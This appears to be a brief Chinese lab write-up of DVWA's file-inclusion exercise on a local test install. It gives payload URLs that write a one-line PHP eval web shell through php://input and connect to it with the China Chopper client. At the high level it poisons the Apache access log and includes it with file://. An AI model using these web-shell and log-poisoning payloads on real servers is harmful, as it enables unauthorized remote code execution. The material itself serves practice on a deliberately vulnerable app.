LOW、Medium



包含值是page
使用php://进行http://localhost:8083/DVWA-master/vulnerabilities/fi/?page=php://input

进行post写入小马<?phpeval($_REQUEST[666]);?>

验证http://localhost:8083/DVWA-master/vulnerabilities/fi/?page=php://input&666=phpinfo();

菜刀连接http://localhost:8083/DVWA-master/vulnerabilities/fi/?page=php://input 666


High级别
file://
经过实验值后面只能上传file*,所以利用file://来读取本地的文件
我们可以通过日志文件来进行读取
首先我们先写小马,通过bp,url上写会被转义

更改内容,写上小马,日志里会有
GET/DVWA-master/vulnerabilities/fi/?page= HTTP/1.1
查看日志文件http://localhost:8083/DVWA-master/vulnerabilities/fi/?page=file://D:xamppapachelogsaccess.log

可以看见有666
验证666有没有用http://localhost:8083/DVWA-master/vulnerabilities/fi/?page=file://D:xamppapachelogsaccess.log&666=phpinfo();

用菜刀连http://localhost:8083/DVWA-master/vulnerabilities/fi/?page=file://D:xamppapachelogsaccess.log 666

